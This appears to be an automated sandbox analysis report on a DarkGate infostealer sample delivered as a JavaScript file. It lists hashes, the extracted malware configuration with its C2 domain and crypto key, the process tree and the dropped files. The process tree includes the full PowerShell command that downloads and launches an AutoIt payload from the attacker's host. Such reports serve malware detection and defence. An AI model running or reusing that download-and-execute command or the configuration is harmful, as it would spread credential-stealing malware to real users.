Analysis

  • max time kernel
    142s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231023-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-11-2023 14:18

General

  • Target

    app(060e45bf7b57d4).js

  • Size

    252KB

  • MD5

    b428fd3b31d80dbdbbe4ee4949cfbe54

  • SHA1

    3f39780bffd9b6b04dba52843622497606808020

  • SHA256

    16613e7c07681726ab577e6ac14114cb42691838fa3c6c4c1bef7dafa2c7c4a0

  • SHA512

    dd77e51e0d6c573d7fe7a3d5ac50b23fe0d81a3323ad89f80a8a3eadd61dc2cff9a6f86ea7632315ec3549e7528053b3634ebc8aec158a3023ca434ea85988c3

  • SSDEEP

    6144:Fe7hgXeerjqlI2Iro+lJe7hgXeerjqlI2Iro+8:FIhgSlI23mJIhgSlI23V

Score
10/10

Malware Config

Extracted

Family

darkgate

Botnet

ADS5

C2

http://siliconerumble.com

Attributes
  • alternative_c2_port

    8080

  • anti_analysis

    true

  • anti_debug

    true

  • anti_vm

    true

  • c2_port

    443

  • check_disk

    true

  • check_ram

    true

  • check_xeon

    false

  • crypter_au3

    false

  • crypter_dll

    false

  • crypter_rawstub

    true

  • crypto_key

    zSfdFmnnAquXKs

  • internal_mutex

    txtMut

  • minimum_disk

    32

  • minimum_ram

    6003

  • ping_interval

    4

  • rootkit

    true

  • startup_persistence

    true

  • username

    ADS5

Signatures

  • DarkGate

    DarkGate is an infostealer written in C++.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 5 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\app(060e45bf7b57d4).js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1596
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command ni 'C:/tepp' -Type Directory -Force;cd 'C:/tepp'; Invoke-WebRequest -Uri 'http://siliconerumble.com:443' -OutFile 'AutoIt3.exe' -UserAgent 'curl/7.68.0';Invoke-WebRequest -Uri 'http://siliconerumble.com:443/msitotdjhak' -OutFile 'totdjhak.au3' -UserAgent 'curl/7.68.0';start 'AutoIt3.exe' -a 'totdjhak.au3'"; Stop-Process -Name "WScript"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3348
      • C:\tepp\AutoIt3.exe
        "C:\tepp\AutoIt3.exe" totdjhak.au3
        3⤵
        • Executes dropped EXE
        • Checks processor information in registry
        PID:4396

Network

MITRE ATT&CK Matrix ATT&CK v13

Discovery

Query Registry

2
T1012

System Information Discovery

3
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_adm5zfoq.aal.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\tepp\AutoIt3.exe
    Filesize

    872KB

    MD5

    c56b5f0201a3b3de53e561fe76912bfd

    SHA1

    2a4062e10a5de813f5688221dbeb3f3ff33eb417

    SHA256

    237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

    SHA512

    195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

  • C:\tepp\AutoIt3.exe
    Filesize

    872KB

    MD5

    c56b5f0201a3b3de53e561fe76912bfd

    SHA1

    2a4062e10a5de813f5688221dbeb3f3ff33eb417

    SHA256

    237d1bca6e056df5bb16a1216a434634109478f882d3b1d58344c801d184f95d

    SHA512

    195b98245bb820085ae9203cdb6d470b749d1f228908093e8606453b027b7d7681ccd7952e30c2f5dd40f8f0b999ccfc60ebb03419b574c08de6816e75710d2c

  • C:\tepp\totdjhak.au3
    Filesize

    508KB

    MD5

    1df0df7aa48965762597452d418db3f3

    SHA1

    6b2137d66246ad3c994a28141736bc707c88184b

    SHA256

    52a1722f0614e1c88473f4240ca1f5ac06d952159236014ef721598bc0889408

    SHA512

    19dbca338a166d355f1d7ed05801e212995053df3805d53decd8898bdd84807a2b0b2d827c277909dd9dd9b5999886117a12812b1c1f05ea988a8a2c701aa39e

  • memory/3348-0-0x0000021DBFEF0000-0x0000021DBFF12000-memory.dmp
    Filesize

    136KB

  • memory/3348-10-0x00007FFFABC20000-0x00007FFFAC6E1000-memory.dmp
    Filesize

    10.8MB

  • memory/3348-11-0x0000021DBFF50000-0x0000021DBFF60000-memory.dmp
    Filesize

    64KB

  • memory/3348-25-0x00007FFFABC20000-0x00007FFFAC6E1000-memory.dmp
    Filesize

    10.8MB

  • memory/4396-28-0x00000000044D0000-0x00000000045D0000-memory.dmp
    Filesize

    1024KB

  • memory/4396-29-0x0000000004B80000-0x0000000004D15000-memory.dmp
    Filesize

    1.6MB

  • memory/4396-30-0x0000000004B80000-0x0000000004D15000-memory.dmp
    Filesize

    1.6MB